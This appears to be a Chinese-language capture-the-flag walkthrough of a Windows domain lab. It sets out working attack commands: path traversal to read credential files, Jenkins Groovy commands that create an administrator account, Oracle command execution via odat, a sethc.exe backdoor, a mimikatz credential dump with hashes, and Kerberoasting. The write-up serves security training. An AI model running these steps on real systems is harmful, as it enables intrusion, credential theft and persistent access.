Privilege 开题 39.98.112.69
第一关 ./fscan -h 39.98.112.69 -p 1-65535
tools/content-log.php存在任意文件读取
<?php $logfile = rawurldecode ( $_GET ['logfile' ] );if ( file_exists ( $logfile ) ) { $text = file_get_contents ( $logfile ); echo ( $text ); } exit ;
利用漏洞读取flag
/tools/content-log.php?logfile=../../../../../../../../../../../users/administrator/flag/flag01.txt
关卡1:请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
/tools/content-log.php?logfile=../../../../../../../../../ProgramData/Jenkins/.jenkins/secrets/initialAdminPassword
账号密码 admin/510235cf43f14e83b88a9f144199655b 登陆后台
在/script/目录执行脚本
groovy脚本增加用户
println "net user Tsuki pass@123 /add" .execute().text println "net localgroup administrators Tsuki /add" .execute().text
rdp连接
第二关
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
扫内网,搭代理
172.22.14.7:445 open 172.22.14.7:8080 open 172.22.14.31:1521 open 172.22.14.7:3306 open 172.22.14.46:445 open 172.22.14.31:445 open 172.22.14.11:445 open 172.22.14.46:139 open 172.22.14.31:139 open 172.22.14.11:139 open 172.22.14.7:139 open 172.22.14.46:135 open 172.22.14.31:135 open 172.22.14.11:135 open 172.22.14.7:135 open 172.22.14.46:80 open 172.22.14.16:80 open 172.22.14.7:80 open 172.22.14.16:22 open 172.22.14.16:8060 open 172.22.14.11:88 open 172.22.14.16:9094 open [*] alive ports len is: 22 start vulscan [*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None [*] NetInfo [*]172.22.14.31 [->]XR-ORACLE [->]172.22.14.31 [*] NetInfo [*]172.22.14.11 [->]XR-DC [->]172.22.14.11 [*] NetBios 172.22.14.46 XIAORANG\XR-0923 [*] NetInfo [*]172.22.14.7 [->]XR-JENKINS [->]172.22.14.7 [*] NetInfo [*]172.22.14.46 [->]XR-0923 [->]172.22.14.46 [*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC [*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server [*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found [*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE [*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in [*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP [*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab [+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file
内网地址
Host or FQDN
简要描述
172.22.14.7
XR-JENKINS
WordPress 服务(80 端口)、jenkins 服务(8080 端口)
172.22.14.16
gitlab.xiaorang.lab
gitlab 服务器
172.22.14.31
XR-ORACLE
oracle 数据库服务器
172.22.14.46
XR-0923.xiaorang.lab
内网 PC 机
172.22.14.11
XR-DC.xiaorang.lab
域控
在 /manage/credentials/ 目录下,可以查看到该唯一标识符(apiTokenId):
访问 /manage/credentials/store/system/domain/_/credential/9eca4a05-e058-4810-b952-bd6443e6d9a8/update 地址,可以获得密文的 Gitlab API token
回到/script/
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
拉取对应项目
在xradmin中的ruoyi-admin/src/main/resources/application-druid.yml找到oracle账号密码
internal-secret/credentials.txt里找到XR-0923的账密
XR-0923 | zhangshuai | wSbEajHzZs
然后利用odat打oracle
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user Tsuki pass@123 /add' proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators Tsuki /add'
rdp连31拿flag
第三关
攻击办公区内网,获取办公 PC 控制权限,并通过特权滥用提升至 SYSTEM 权限。
zhangshuai/wSbEajHzZs直接RDP连上46
权限不够
查看用户组
由于属于Remote Management Use,所以可以使用evil-winrm连接机器
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
发现多了一个SeRestorePrivilege
奇安信攻防社区-手把手教你Windows提权
ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe
锁定用户然后连按shift
第四关
尝试接管备份管理操作员帐户,并通过转储 NTDS 获得域管理员权限,最终控制整个域环境。
创建管理员用户登录
上传猕猴桃
privilege::debug sekurlsa::logonpasswords
遇到报错,好像是版本问题
换了一个欧克了
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 4843546 (00000000:0049e81a) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 2025/3/2 13:49:02 SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 4842744 (00000000:0049e4f8) Session : Interactive from 2 User Name : UMFD-2 Domain : Font Driver Host Logon Server : (null) Logon Time : 2025/3/2 13:49:02 SID : S-1-5-96-0-2 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 2377431 (00000000:002446d7) Session : Service from 0 User Name : DefaultAppPool Domain : IIS APPPOOL Logon Server : (null) Logon Time : 2025/3/2 13:16:27 SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 64247 (00000000:0000faf7) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2025/3/2 12:52:16 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 8519c5a89b2cd4d679a5a36f26863e5d * SHA1 : 42d8188bc30ff0880b838e368c6e5522b86f978d tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD ssp : credman : cloudap : Authentication Id : 0 ; 64229 (00000000:0000fae5) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2025/3/2 12:52:16 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : XR-0923$ Domain : XIAORANG Logon Server : (null) Logon Time : 2025/3/2 12:52:15 SID : S-1-5-20 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : xr-0923$ * Domain : XIAORANG.LAB * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 33451 (00000000:000082ab) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 2025/3/2 12:52:15 SID : S-1-5-96-0-1 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 6540654 (00000000:0063cd6e) Session : RemoteInteractive from 3 User Name : Tsuki Domain : XR-0923 Logon Server : XR-0923 Logon Time : 2025/3/2 14:02:49 SID : S-1-5-21-754105099-1176710061-2177073800-1002 msv : [00000003] Primary * Username : Tsuki * Domain : XR-0923 * NTLM : 51a52c415264a8fc31520f66f2f50459 * SHA1 : fd8d24d6cc3b3cb3980fc67a4e83a3023af0c508 tspkg : wdigest : * Username : Tsuki * Domain : XR-0923 * Password : pass@123 kerberos : * Username : Tsuki * Domain : XR-0923 * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 6540590 (00000000:0063cd2e) Session : RemoteInteractive from 3 User Name : Tsuki Domain : XR-0923 Logon Server : XR-0923 Logon Time : 2025/3/2 14:02:49 SID : S-1-5-21-754105099-1176710061-2177073800-1002 msv : [00000003] Primary * Username : Tsuki * Domain : XR-0923 * NTLM : 51a52c415264a8fc31520f66f2f50459 * SHA1 : fd8d24d6cc3b3cb3980fc67a4e83a3023af0c508 tspkg : wdigest : * Username : Tsuki * Domain : XR-0923 * Password : pass@123 kerberos : * Username : Tsuki * Domain : XR-0923 * Password : pass@123 ssp : credman : cloudap : Authentication Id : 0 ; 6526244 (00000000:00639524) Session : Interactive from 3 User Name : DWM-3 Domain : Window Manager Logon Server : (null) Logon Time : 2025/3/2 14:02:49 SID : S-1-5-90-0-3 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 6525306 (00000000:0063917a) Session : Interactive from 3 User Name : DWM-3 Domain : Window Manager Logon Server : (null) Logon Time : 2025/3/2 14:02:49 SID : S-1-5-90-0-3 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 6524657 (00000000:00638ef1) Session : Interactive from 3 User Name : UMFD-3 Domain : Font Driver Host Logon Server : (null) Logon Time : 2025/3/2 14:02:49 SID : S-1-5-96-0-3 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 4884110 (00000000:004a868e) Session : RemoteInteractive from 2 User Name : zhangshuai Domain : XR-0923 Logon Server : XR-0923 Logon Time : 2025/3/2 13:49:03 SID : S-1-5-21-754105099-1176710061-2177073800-1001 msv : [00000003] Primary * Username : zhangshuai * Domain : XR-0923 * NTLM : f97d5a4b44b11bc257a63c3f76f18a9a * SHA1 : f6ff2714d556240436758527e190e329f05cd43d tspkg : wdigest : * Username : zhangshuai * Domain : XR-0923 * Password : (null) kerberos : * Username : zhangshuai * Domain : XR-0923 * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 4884076 (00000000:004a866c) Session : RemoteInteractive from 2 User Name : zhangshuai Domain : XR-0923 Logon Server : XR-0923 Logon Time : 2025/3/2 13:49:03 SID : S-1-5-21-754105099-1176710061-2177073800-1001 msv : [00000003] Primary * Username : zhangshuai * Domain : XR-0923 * NTLM : f97d5a4b44b11bc257a63c3f76f18a9a * SHA1 : f6ff2714d556240436758527e190e329f05cd43d tspkg : wdigest : * Username : zhangshuai * Domain : XR-0923 * Password : (null) kerberos : * Username : zhangshuai * Domain : XR-0923 * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 4843878 (00000000:0049e966) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 2025/3/2 13:49:02 SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 995 (00000000:000003e3) Session : Service from 0 User Name : IUSR Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2025/3/2 12:52:18 SID : S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : ssp : credman : cloudap : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2025/3/2 12:52:16 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 33422 (00000000:0000828e) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 2025/3/2 12:52:15 SID : S-1-5-96-0-0 msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : e9 54 f2 60 48 67 2e b8 3c fe e4 be 9a fe 37 55 f5 04 df 78 90 c0 3d 4e 2e 9e 9b 20 9f 0c 88 39 97 90 18 36 70 6e 98 0e cd 78 33 42 4d d7 e9 e5 af 9f 5a 9f fc fb d0 8a b9 1f af 67 b0 cf 90 bd 8c 2b e0 20 a6 f1 6c 70 fa 84 54 94 a2 47 23 b0 57 75 61 15 3f 39 a1 02 76 d3 72 eb a5 41 db e1 f0 22 44 ce fc 54 a9 75 84 e6 6c 48 fe 8a ac 84 6a 41 d1 99 1e 94 aa 70 4c 3d 56 8e dc 18 db 88 56 40 a8 cc 5d 50 61 14 c0 81 86 f1 02 14 aa 1c cd 59 3b 0e 8f 63 9a f2 40 00 65 39 95 7a 1e 40 85 a9 85 65 73 03 9e 0e 3e 99 52 fd 96 e7 17 3c 4e 93 07 77 6e 7a 56 d4 1a d4 a3 3c 3b e3 c0 41 4c 26 fe 6e 4c ad 0e f6 fa 7b d6 ad 69 c1 4e 93 38 dc 77 2a 63 f5 77 e1 0a 9a 20 88 87 7f 63 58 ac fa 1b c7 19 b1 86 71 47 8f 32 30 07 05 28 95 ssp : credman : cloudap : Authentication Id : 0 ; 32336 (00000000:00007e50) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2025/3/2 12:52:15 SID : msv : [00000003] Primary * Username : XR-0923$ * Domain : XIAORANG * NTLM : 6cb8f3797fb44d3ee3a0cd55ea6ff8f1 * SHA1 : e9f071d7de06d0492a584daea984695504f6dd51 tspkg : wdigest : kerberos : ssp : credman : cloudap : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : XR-0923$ Domain : XIAORANG Logon Server : (null) Logon Time : 2025/3/2 12:52:15 SID : S-1-5-18 msv : tspkg : wdigest : * Username : XR-0923$ * Domain : XIAORANG * Password : (null) kerberos : * Username : xr-0923$ * Domain : XIAORANG.LAB * Password : (null) ssp : credman : cloudap :
向域控查询注册了SPN的用户
proxychains python GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes ':6cb8f3797fb44d3ee3a0cd55ea6ff8f1' -dc-ip 172.22.14.11
获取此用户的ST
proxychains python GetUserSPNs.py xiaorang.lab/'XR-0923$' -hashes :6cb8f3797fb44d3ee3a0cd55ea6ff8f1 -dc-ip 172.22.14.11 -request-user tianjing
hash.txt
